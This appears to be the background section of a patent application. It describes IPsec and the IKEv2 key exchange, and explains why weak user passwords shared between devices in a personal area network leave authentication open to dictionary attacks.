In current communication, it is important to secure the communicated messages. As there are many possibilities for interception, eavesdropping and tampering, the communicated messages should be secured against fraud.
A known approach for securing communication is the internet protocol security (IPsec). The IPsec provides confidentiality, data integrity, access control, and data source authentication of datagrams being sent over various communication channels. These services are provided by maintaining shared secrets between the source and the sink of an IP-datagram. The states define, among other things, the specific services provided to the datagrams. This may be which cryptographic algorithms will be use to provide the services as well as the key used as input to the cryptographic algorithms. The internet key exchange (IKE) allows mutual authentication and establishment of shared secrets between two parties.
Therefore, it is proposed to use shared secret information and a set of cryptographic algorithms to be used. All communication via this protocol consists of pairs of messages. These pairs comprise a request and a response.
When establishing an IKE communication, at first IKE_SA_INIT messages are exchanged and thereafter IKE_AUTH messages are exchanged between an initiator and a responder. In most cases only two IKE_SA_INIT messages and two IKE_AUTH messages are exchanged to establish secure communication.
The IKEv2-protocol is described in detail in C. Kaufmann: “Internet key exchange (IKEv2) protocol”, IETF IPsec working group, draft-ietf-ipsec-IKEv2-10.txt, Aug. 16, 2003.
During initiation of the communication, security parameters are negotiated between initiator and responder, e.g. nonces (one-time random numbers), parameters and Diffie-Hellman values are exchanged within IKE_SA_INIT messages. After that in IKE_AUTH messages identities and proves of knowledge of the secrets corresponding to the two identities (initiator, responder) are transmitted.
In the current versions of the internet key exchange protocol, the parties communicate and authenticate each other using public key certificates or strong shared secret keys. However, such messages are not applicable to situation where a constrained key management channel is used. This is the case in a personal area network, where the user wants to initialise an ad-hoc security association between two devices by making the devices share a short secret password.
For user authentication in IKEv2 the shared keys should be a strong shared secret key. In case the shared keys are derived solely from a user, communication might be insecure. User passwords are typically insecure, because they are unlikely to have sufficient unpredictability to resist dictionary attacks.
Therefore, communication using IKEv2 protocols without strong shared secrets might be insecure. Authentication between initiator and responder as well as confidentiality and integrity of the messages to be sent, might be subject to fraud.